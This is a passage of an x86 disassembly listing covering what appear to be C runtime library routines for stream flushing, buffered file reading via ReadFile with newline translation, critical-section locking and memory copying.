call sub_41AD23
pop ecx
mov [ebp+var_1C], eax
jmp short loc_41AE0C
; ---------------------------------------------------------------------------
loc_41ADFD: ; CODE XREF: sub_41ADA6+49�j
call sub_41B935
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41AE0C: ; CODE XREF: sub_41ADA6+55�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41AE1D
mov eax, [ebp+var_1C]
jmp short loc_41AE3B
sub_41ADA6 endp
; =============== S U B R O U T I N E =======================================
sub_41AE1A proc near ; DATA XREF: .text:stru_42C0B8�o
mov ebx, [ebp+8]
sub_41AE1A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AE1D proc near ; CODE XREF: sub_41ADA6+6A�p
push ebx
call sub_41F5BF
pop ecx
retn
sub_41AE1D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41ADA6
loc_41AE25: ; CODE XREF: sub_41ADA6+15�j
; sub_41ADA6+35�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41AE3B: ; CODE XREF: sub_41ADA6+72�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41ADA6
; =============== S U B R O U T I N E =======================================
sub_41AE41 proc near ; CODE XREF: sub_416DC1+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41AE6A
test al, 8
jz short loc_41AE6A
push dword ptr [esi+8]
call sub_416C97
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41AE6A: ; CODE XREF: sub_41AE41+A�j
; sub_41AE41+E�j
pop esi
retn
sub_41AE41 endp
; =============== S U B R O U T I N E =======================================
sub_41AE6C proc near ; CODE XREF: sub_416DC1+10�p
; sub_4184E8+38�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_41AEBB
test ax, 108h
jz short loc_41AEBB
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41AEBA
push edi
push eax
push dword ptr [esi+10h]
call sub_41E40E
add esp, 0Ch
cmp eax, edi
jnz short loc_41AEB3
mov eax, [esi+0Ch]
test al, al
jns short loc_41AEBA
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_41AEBA
; ---------------------------------------------------------------------------
loc_41AEB3: ; CODE XREF: sub_41AE6C+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41AEBA: ; CODE XREF: sub_41AE6C+25�j
; sub_41AE6C+3D�j ...
pop edi
loc_41AEBB: ; CODE XREF: sub_41AE6C+13�j
; sub_41AE6C+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_41AE6C endp
; =============== S U B R O U T I N E =======================================
sub_41AEC9 proc near ; CODE XREF: sub_41AEF7+67�p
; sub_41AEF7+82�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41AE6C
test eax, eax
pop ecx
jz short loc_41AEDE
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AEDE: ; CODE XREF: sub_41AEC9+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_41AEF3
push dword ptr [esi+10h]
call sub_41F72E
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AEF3: ; CODE XREF: sub_41AEC9+19�j
xor eax, eax
pop esi
retn
sub_41AEC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AEF7 proc near ; CODE XREF: sub_41AFCC+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041AFA8 SIZE 0000001B BYTES
push 14h
push offset stru_42C0C8
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
push 1
call sub_41A166
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_41AF18: ; CODE XREF: sub_41AEF7+99�j
mov [ebp+var_24], esi
cmp esi, dword_482940
jge loc_41AFA8
mov eax, dword_481920
mov eax, [eax+esi*4]
cmp eax, edi
jz short loc_41AF8F
test byte ptr [eax+0Ch], 83h
jz short loc_41AF8F
push eax
push esi
call sub_41B0C1
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_481920
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41AF87
cmp [ebp+arg_0], edx
jnz short loc_41AF6E
push eax
call sub_41AEC9
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41AF87
inc [ebp+var_1C]
jmp short loc_41AF87
; ---------------------------------------------------------------------------
loc_41AF6E: ; CODE XREF: sub_41AEF7+64�j
cmp [ebp+arg_0], edi
jnz short loc_41AF87
test cl, 2
jz short loc_41AF87
push eax
call sub_41AEC9
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41AF87
or [ebp+var_20], eax
loc_41AF87: ; CODE XREF: sub_41AEF7+5F�j
; sub_41AEF7+70�j ...
mov [ebp+ms_exc.disabled], edi
call sub_41AF97
loc_41AF8F: ; CODE XREF: sub_41AEF7+3A�j
; sub_41AEF7+40�j
inc esi
jmp short loc_41AF18
sub_41AEF7 endp
; =============== S U B R O U T I N E =======================================
sub_41AF92 proc near ; DATA XREF: .text:0042C0DC�o
xor edi, edi
mov esi, [ebp-24h]
sub_41AF92 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AF97 proc near ; CODE XREF: sub_41AEF7+93�p
mov eax, dword_481920
push dword ptr [eax+esi*4]
push esi
call sub_41B113
pop ecx
pop ecx
retn
sub_41AF97 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41AEF7
loc_41AFA8: ; CODE XREF: sub_41AEF7+2A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41AFC3
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_41AFBD
mov eax, [ebp+var_20]
loc_41AFBD: ; CODE XREF: sub_41AEF7+C1�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41AEF7
; =============== S U B R O U T I N E =======================================
sub_41AFC3 proc near ; CODE XREF: sub_41AEF7+B5�p
; DATA XREF: .text:stru_42C0C8�o
push 1
call sub_41A0D2
pop ecx
retn
sub_41AFC3 endp
; =============== S U B R O U T I N E =======================================
sub_41AFCC proc near ; CODE XREF: sub_41B07E�p
push 1
call sub_41AEF7
pop ecx
retn
sub_41AFCC endp
; =============== S U B R O U T I N E =======================================
sub_41AFD5 proc near ; DATA XREF: .text:0042E010�o
mov eax, dword_482940
test eax, eax
push esi
push 14h
pop esi
jnz short loc_41AFE9
mov eax, 200h
jmp short loc_41AFEF
; ---------------------------------------------------------------------------
loc_41AFE9: ; CODE XREF: sub_41AFD5+B�j
cmp eax, esi
jge short loc_41AFF4
mov eax, esi
loc_41AFEF: ; CODE XREF: sub_41AFD5+12�j
mov dword_482940, eax
loc_41AFF4: ; CODE XREF: sub_41AFD5+16�j
push 4
push eax
call sub_41E5AE
test eax, eax
pop ecx
pop ecx
mov dword_481920, eax
jnz short loc_41B025
push 4
push esi
mov dword_482940, esi
call sub_41E5AE
test eax, eax
pop ecx
pop ecx
mov dword_481920, eax
jnz short loc_41B025
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B025: ; CODE XREF: sub_41AFD5+30�j
; sub_41AFD5+49�j
xor edx, edx
mov ecx, offset off_432638
jmp short loc_41B033
; ---------------------------------------------------------------------------
loc_41B02E: ; CODE XREF: sub_41AFD5+6D�j
mov eax, dword_481920
loc_41B033: ; CODE XREF: sub_41AFD5+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_4328B8
jl short loc_41B02E
xor ecx, ecx
mov edx, offset dword_432648
loc_41B04B: ; CODE XREF: sub_41AFD5+A3�j
mov esi, ecx
mov eax, ecx
and eax, 1Fh
sar esi, 5
mov esi, dword_4815E0[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_41B06B
test eax, eax
jnz short loc_41B06E
loc_41B06B: ; CODE XREF: sub_41AFD5+90�j
or dword ptr [edx], 0FFFFFFFFh
loc_41B06E: ; CODE XREF: sub_41AFD5+94�j
add edx, 20h
inc ecx
cmp edx, offset dword_4326A8
jl short loc_41B04B
xor eax, eax
pop esi
retn
sub_41AFD5 endp
; =============== S U B R O U T I N E =======================================
sub_41B07E proc near ; DATA XREF: .text:0042E028�o
; FUNCTION CHUNK AT 0041F7EA SIZE 00000092 BYTES
call sub_41AFCC
cmp byte_48119C, 0
jz short locret_41B091
jmp loc_41F7EA
; ---------------------------------------------------------------------------
locret_41B091: ; CODE XREF: sub_41B07E+C�j
retn
sub_41B07E endp
; =============== S U B R O U T I N E =======================================
sub_41B092 proc near ; CODE XREF: sub_416E0D+27�p
; sub_416F47+F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_432638
cmp eax, ecx
jb short loc_41B0B6
cmp eax, offset dword_432898
ja short loc_41B0B6
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41A166
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B0B6: ; CODE XREF: sub_41B092+B�j
; sub_41B092+12�j
add eax, 20h
push eax
call dword_422018 ; RtlEnterCriticalSection
retn
sub_41B092 endp
; =============== S U B R O U T I N E =======================================
sub_41B0C1 proc near ; CODE XREF: sub_41AEF7+44�p
; sub_41B9BA+66�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41B0D5
add eax, 10h
push eax
call sub_41A166
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B0D5: ; CODE XREF: sub_41B0C1+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_422018 ; RtlEnterCriticalSection
retn
sub_41B0C1 endp
; =============== S U B R O U T I N E =======================================
sub_41B0E4 proc near ; CODE XREF: sub_416E56+1�p
; sub_416F89+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_432638
cmp eax, ecx
jb short loc_41B108
cmp eax, offset dword_432898
ja short loc_41B108
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41A0D2
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B108: ; CODE XREF: sub_41B0E4+B�j
; sub_41B0E4+12�j
add eax, 20h
push eax
call dword_422014 ; RtlLeaveCriticalSection
retn
sub_41B0E4 endp
; =============== S U B R O U T I N E =======================================
sub_41B113 proc near ; CODE XREF: sub_41AF97+9�p
; sub_41B9BA+7D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41B127
add eax, 10h
push eax
call sub_41A0D2
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41B127: ; CODE XREF: sub_41B113+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_422014 ; RtlLeaveCriticalSection
retn
sub_41B113 endp
; =============== S U B R O U T I N E =======================================
sub_41B136 proc near ; CODE XREF: sub_416E5E+AA�p
; sub_418177+44�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41B212
test al, 40h
jnz loc_41B212
test al, 2
jz short loc_41B15D
or eax, 20h
mov [esi+0Ch], eax
jmp loc_41B212
; ---------------------------------------------------------------------------
loc_41B15D: ; CODE XREF: sub_41B136+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41B172
push esi
call sub_41E4B9
pop ecx
jmp short loc_41B177
; ---------------------------------------------------------------------------
loc_41B172: ; CODE XREF: sub_41B136+31�j
mov eax, [esi+8]
mov [esi], eax
loc_41B177: ; CODE XREF: sub_41B136+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41B3E4
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_41B201
cmp eax, 0FFFFFFFFh
jz short loc_41B201
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41B1D6
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_41B1BC
mov edi, ecx
sar edi, 5
mov edi, dword_4815E0[edi*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_41B1C1
; ---------------------------------------------------------------------------
loc_41B1BC: ; CODE XREF: sub_41B136+6D�j
mov edi, offset dword_432C70
loc_41B1C1: ; CODE XREF: sub_41B136+84�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_41B1D6
or edx, 2000h
mov [esi+0Ch], edx
loc_41B1D6: ; CODE XREF: sub_41B136+64�j
; sub_41B136+95�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41B1F3
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41B1F3
test ch, 4
jnz short loc_41B1F3
mov dword ptr [esi+18h], 1000h
loc_41B1F3: ; CODE XREF: sub_41B136+A7�j
; sub_41B136+AF�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B201: ; CODE XREF: sub_41B136+57�j
; sub_41B136+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41B212: ; CODE XREF: sub_41B136+A�j
; sub_41B136+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41B136 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B217 proc near ; CODE XREF: sub_41B3E4+52�p
; sub_41F885+2A7�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_41B3DD
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
lea edi, ds:4815E0h[ecx*4]
mov eax, [edi]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_41B3DD
test cl, 48h
jz short loc_41B27D
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41B27D
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41B27D: ; CODE XREF: sub_41B217+47�j
; sub_41B217+4E�j
push 0
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
mov eax, [edi]
push edx
push dword ptr [eax+esi]
call dword_42208C ; ReadFile
test eax, eax
jnz short loc_41B2CF
call dword_422004 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_41B2B7
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
mov [eax], esi
jmp short loc_41B2C7
; ---------------------------------------------------------------------------
loc_41B2B7: ; CODE XREF: sub_41B217+8A�j
cmp eax, 6Dh
jz loc_41B3DD
push eax
call sub_41B947
pop ecx
loc_41B2C7: ; CODE XREF: sub_41B217+9E�j
or eax, 0FFFFFFFFh
jmp loc_41B3DF
; ---------------------------------------------------------------------------
loc_41B2CF: ; CODE XREF: sub_41B217+7D�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [ecx]
test al, al
jns loc_41B3D8
test edx, edx
jz short loc_41B2F2
cmp byte ptr [ebx], 0Ah
jnz short loc_41B2F2
or al, 4
jmp short loc_41B2F4
; ---------------------------------------------------------------------------
loc_41B2F2: ; CODE XREF: sub_41B217+D0�j
; sub_41B217+D5�j
and al, 0FBh
loc_41B2F4: ; CODE XREF: sub_41B217+D9�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
add ecx, eax
cmp eax, ecx
mov [ebp+arg_8], eax
mov [ebp+var_8], ecx
jnb loc_41B3D2
loc_41B30C: ; CODE XREF: sub_41B217+1A3�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41B3C2
cmp al, 0Dh
jz short loc_41B328
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_41B3B4
; ---------------------------------------------------------------------------
loc_41B328: ; CODE XREF: sub_41B217+104�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41B342
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41B33D
add [ebp+arg_8], 2
jmp short loc_41B396
; ---------------------------------------------------------------------------
loc_41B33D: ; CODE XREF: sub_41B217+11E�j
mov [ebp+arg_8], eax
jmp short loc_41B3B0
; ---------------------------------------------------------------------------
loc_41B342: ; CODE XREF: sub_41B217+115�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call dword_42208C ; ReadFile
test eax, eax
jnz short loc_41B36A
call dword_422004 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41B3B0
loc_41B36A: ; CODE XREF: sub_41B217+147�j
cmp [ebp+var_C], 0
jz short loc_41B3B0
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_41B38B
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41B396
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_41B3B3
; ---------------------------------------------------------------------------
loc_41B38B: ; CODE XREF: sub_41B217+160�j
cmp ebx, [ebp+arg_4]
jnz short loc_41B39B
cmp [ebp+var_1], 0Ah
jnz short loc_41B39B
loc_41B396: ; CODE XREF: sub_41B217+124�j
; sub_41B217+167�j
mov byte ptr [ebx], 0Ah
jmp short loc_41B3B3
; ---------------------------------------------------------------------------
loc_41B39B: ; CODE XREF: sub_41B217+177�j
; sub_41B217+17D�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41D676
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41B3B4
loc_41B3B0: ; CODE XREF: sub_41B217+129�j
; sub_41B217+151�j ...
mov byte ptr [ebx], 0Dh
loc_41B3B3: ; CODE XREF: sub_41B217+172�j
; sub_41B217+182�j
inc ebx
loc_41B3B4: ; CODE XREF: sub_41B217+10C�j
; sub_41B217+197�j
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41B30C
jmp short loc_41B3D2
; ---------------------------------------------------------------------------
loc_41B3C2: ; CODE XREF: sub_41B217+FC�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41B3D2
or al, 2
mov [esi], al
loc_41B3D2: ; CODE XREF: sub_41B217+EF�j
; sub_41B217+1A9�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_41B3D8: ; CODE XREF: sub_41B217+C8�j
mov eax, [ebp+var_8]
jmp short loc_41B3DF
; ---------------------------------------------------------------------------
loc_41B3DD: ; CODE XREF: sub_41B217+16�j
; sub_41B217+3E�j ...
xor eax, eax
loc_41B3DF: ; CODE XREF: sub_41B217+B3�j
; sub_41B217+1C4�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3E4 proc near ; CODE XREF: sub_416E5E+91�p
; sub_41B136+4A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041B473 SIZE 0000001C BYTES
push 0Ch
push offset stru_42C0E0
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815D0
jnb short loc_41B473
mov eax, ebx
sar eax, 5
lea edi, ds:4815E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B473
push ebx
call sub_41F54C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B443
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41B217
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41B45A
; ---------------------------------------------------------------------------
loc_41B443: ; CODE XREF: sub_41B3E4+49�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41B45A: ; CODE XREF: sub_41B3E4+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B46B
mov eax, [ebp+var_1C]
jmp short loc_41B489
sub_41B3E4 endp
; =============== S U B R O U T I N E =======================================
sub_41B468 proc near ; DATA XREF: .text:stru_42C0E0�o
mov ebx, [ebp+8]
sub_41B468 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B46B proc near ; CODE XREF: sub_41B3E4+7A�p
push ebx
call sub_41F5BF
pop ecx
retn
sub_41B46B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B3E4
loc_41B473: ; CODE XREF: sub_41B3E4+15�j
; sub_41B3E4+35�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41B489: ; CODE XREF: sub_41B3E4+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41B3E4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B490 proc near ; CODE XREF: sub_416E5E+5F�p
; sub_416F93+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41B4B0
cmp edi, eax
jb loc_41B62C
loc_41B4B0: ; CODE XREF: sub_41B490+16�j
test edi, 3
jnz short loc_41B4CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41B4EC
rep movsd
jmp off_41B5DC[edx*4]
; ---------------------------------------------------------------------------
loc_41B4CC: ; CODE XREF: sub_41B490+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41B4E4
and eax, 3
add ecx, eax
jmp dword ptr loc_41B4EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_41B4E4: ; CODE XREF: sub_41B490+46�j
jmp dword ptr loc_41B5EC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41B4EC: ; CODE XREF: sub_41B490+31�j
; sub_41B490+8E�j ...
jmp off_41B570[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_41B500
dd offset loc_41B52C
dd offset loc_41B550
; ---------------------------------------------------------------------------
loc_41B500: ; DATA XREF: sub_41B490+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41B4EC
rep movsd
jmp off_41B5DC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41B52C: ; DATA XREF: sub_41B490+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41B4EC
rep movsd
jmp off_41B5DC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41B550: ; DATA XREF: sub_41B490+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41B4EC
rep movsd
jmp off_41B5DC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41B570 dd offset loc_41B5D3 ; DATA XREF: sub_41B490:loc_41B4EC�r
dd offset loc_41B5C0
dd offset loc_41B5B8
dd offset loc_41B5B0
dd offset loc_41B5A8
dd offset loc_41B5A0
dd offset loc_41B598
dd offset loc_41B590
; ---------------------------------------------------------------------------
loc_41B590: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41B598: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41B5A0: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41B5A8: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41B5B0: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41B5B8: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41B5C0: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41B5D3: ; CODE XREF: sub_41B490:loc_41B4EC�j
; DATA XREF: sub_41B490:off_41B570�o
jmp off_41B5DC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41B5DC dd offset loc_41B5EC ; DATA XREF: sub_41B490+35�r
; sub_41B490+92�r ...
dd offset loc_41B5F4
dd offset loc_41B600
dd offset loc_41B614
; ---------------------------------------------------------------------------
loc_41B5EC: ; CODE XREF: sub_41B490+35�j
; sub_41B490+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B5F4: ; CODE XREF: sub_41B490+35�j
; sub_41B490+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41B600: ; CODE XREF: sub_41B490+35�j
; sub_41B490+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B614: ; CODE XREF: sub_41B490+35�j
; sub_41B490+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B62C: ; CODE XREF: sub_41B490+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41B660
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41B654
std
rep movsd
cld
jmp off_41B778[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41B654: ; CODE XREF: sub_41B490+1B5�j
; sub_41B490+210�j ...
neg ecx
jmp off_41B728[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41B660: ; CODE XREF: sub_41B490+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41B678
and eax, 3
sub ecx, eax
jmp dword ptr loc_41B678+4[eax*4]
; ---------------------------------------------------------------------------
loc_41B678: ; CODE XREF: sub_41B490+1DA�j
; DATA XREF: sub_41B490+1E1�r
jmp off_41B778[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41B68B+1
; ---------------------------------------------------------------------------
mov al, 0B6h
inc ecx
add al, bl
mov dh, 41h
loc_41B68B: ; DATA XREF: sub_41B490+1F0�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41B654
std
rep movsd
cld
jmp off_41B778[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41B654
std
rep movsd
cld
jmp off_41B778[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41B654
std
rep movsd
cld
jmp off_41B778[edx*4]
